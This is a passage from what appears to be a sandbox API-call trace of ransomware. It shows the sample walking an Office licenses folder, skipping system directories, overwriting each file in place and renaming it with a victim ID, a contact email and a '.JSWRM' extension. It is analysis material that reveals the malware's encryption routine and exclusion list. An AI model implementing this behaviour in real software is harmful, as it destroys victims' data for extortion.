HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0102.553] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe295c968, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe295c968, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe2a1b5af, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d47, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessR_Trial-ul-oob.xrm-ms", cAlternateFileName="AC031B~1.XRM")) returned 1 [0102.553] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.553] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.553] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.553] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.554] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.554] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.554] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.554] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.554] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.554] lstrcmpiW (lpString1="AccessR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0102.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240f20, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0102.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0102.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessR_Trial-ul-oob.xrm-ms", cchWideChar=27, lpMultiByteStr=0x240fe8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 27 [0102.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0102.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0102.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.554] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11591) returned 1 [0102.555] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0102.555] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0102.557] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.557] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0102.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.557] CloseHandle (hObject=0x45c) returned 1 [0102.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0102.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0102.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0102.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0102.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0102.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0102.558] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0102.559] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe318eac3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe318eac3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3299b47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="AC225E~1.XRM")) returned 1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned -1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.559] lstrcmpiW (lpString1="AccessVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0102.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x240f20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0102.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0102.559] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ppd.xrm-ms", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0102.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0102.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.560] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6794) returned 1 [0102.560] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0102.560] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0102.563] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.563] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0102.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.563] CloseHandle (hObject=0x45c) returned 1 [0102.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0102.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.564] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0102.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0102.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0102.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.564] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0102.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0102.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0102.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0102.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0102.565] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe32738ee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe32738ee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe337e9fc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="AC86E0~1.XRM")) returned 1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.565] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0102.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0102.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0102.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0102.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0102.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0102.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0102.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.566] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11614) returned 1 [0102.566] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0102.566] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0102.569] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.569] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0102.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.569] CloseHandle (hObject=0x45c) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0102.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0102.570] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0102.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0102.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0102.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0102.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.570] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft 